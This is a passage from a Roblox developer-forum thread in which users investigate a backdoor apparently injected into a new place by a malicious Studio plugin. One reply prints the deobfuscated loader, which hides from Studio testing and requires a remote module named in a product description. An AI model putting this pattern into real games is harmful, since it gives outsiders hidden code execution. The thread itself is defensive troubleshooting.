Those tags before and after, the PROP ones along with the special characters, look like the bytes found in a place file with the new compression system. Has anyone had access to your place file?
No. That was a brand new place.
This is what that obfuscated code above turns into:
mPS = game:GetService('MarketplaceService')
pI = mPS:GetProductInfo(2655062037)
mf = tonumber(string.match(pI.Description, '%d+'))
if game:GetService('RunService'):IsStudio() then
return
end
pcall(function()
require(mf)[pI.Name](game.PlaceId)
end)
Basically, it creates the same back door, but only at run time. My question is… how did these files get here? Do these scripts appear in your other places?
2 Likes
I don’t know… I am going to check on my laptop with no plugins installed on a really old place that I made when I didn’t know plugins existed.
It doesn’t happen on my laptop. Right then:
It has to be a plugin because if it is actively happening when creating new places on my main PC, and not on my laptop, then something malicious has wormed it’s way in though a plugin.
This looks related to https://devforum.roblox.com/t/new-removal-plugin-sirhurt-server-side-backdoor-location-csgdictionaryservice-inaccessable-outside-of-the-place-xml-file/214491. We had the same issue too. It was a huge annoyance.
6 Likes
I dont have access to that… New member
1 Like
I’ve pulled all the versions of the module 2679263840. Turns out, there is only one version. Also, this module was created 2018-12-25 at 20:47:09 UTC. That report was from 5 days ago, meaning that the creator actually is requiring a different, new module instead of updating it. We need to find the plugin source to see if it every inserted a script that requires a module that actually has malicious code. Could you upload your plugin directories?
It also means the developer is actively working on this… I wouldn’t run studio any more with your plugins in case he updates it, or sees this discussion since it hasn’t been moved to a private place yet.
1 Like
Sorry was that supposed to be a reply to me? If so how do i find the plugin files?
It was kind of to both, going off of what he said. In studio go to Plugins ->Plugins Folder which will bring up a gui for local plugins. Navigate up to the Roblox folder, then back down to Installed Plugins. These are your public plugins. For Built-in plugins, go to Robox -> Versions -> the folder containing the studio application, there should only be one -> BuiltInPlugins. Once you have those three, I’d bet we’d all love to see them ^.^
1 Like
Yes, this is a malicious script. You almost definitely ran a rigged plugin which inserted code at startup. The bright side is that private module support is being discontinued which hinders a good amount of malicious infection attempts like this. Check your plugins, check your assets, clean your game of foreign material.
I find it interesting that the author used a public module for this attack… not that a private module would have saved them from our prying eyes. Private modules arn’t actually 100% private, consider it obfuscated.
1 Like
“Exploit” developers who add infected code to plugins and bot them to a popular state assume that the user installing them isn’t knowledgeable about the methods they’re using, despite being “out in the open”, so those who don’t bother to properly check code get affected by this. It’s a bunch of redirection nonsense, I can only assume.
2 Likes
This is slightly off topic, but one more post for me. I had mentioned earlier that having a trusted authority to certify code is probably a better method than requiring everything to be public. At least non-technical developers or those without the inclination would know which code they can trust and which might be risky at a glance. If someone wants to revive that post, I’d be happy to add some more comments xD
1 Like
Ok ‘PluginsFolder’ is empty so no local plugins.
I can’t upload a folder to the forums for some reason but there are installed plugins and the same with built-in plugins
How about a link to a file sharing service?
Am I allowed to?
Bare with
I just glanced through the rules quick and didn’t see anything about it. It is a common practice to post links to github with code and possibly executables. If you would like, you can upload each of the rbxmx files one by one instead of the file.
I’ll risk it for the sake of time
Here: https://www.dropbox.com/sh/t16y7oc44yv0fql/AACanMcaEUA3WGReGc9cXCsFa?dl=0
(for any moderators who might think this is leading people off-site for a bad reason, it is a link to a folder containing my current plugins)
I’m not seeing the bad plugin. I’ve checked your 8 public plugins but haven’t gone through the built in ones (they are massive, and more trusted). The thread above does list an offending plugin, and the obfuscated code responsible is immediately apparent… unlike in your plugins. Now, installing the offending plugin listed in the thread above, it is shocking to me that the injected back doors exist in a new place even after the plugin has been removed. This may be the case with your plugins; the offending plugin has already been removed. When you found out about this issue, did you remove any plugins? What plugins have you used in the past couple months?
Note: I’m intentionally not listing the offending plugin’s name listed on the other thread; doing so is a breach of trust.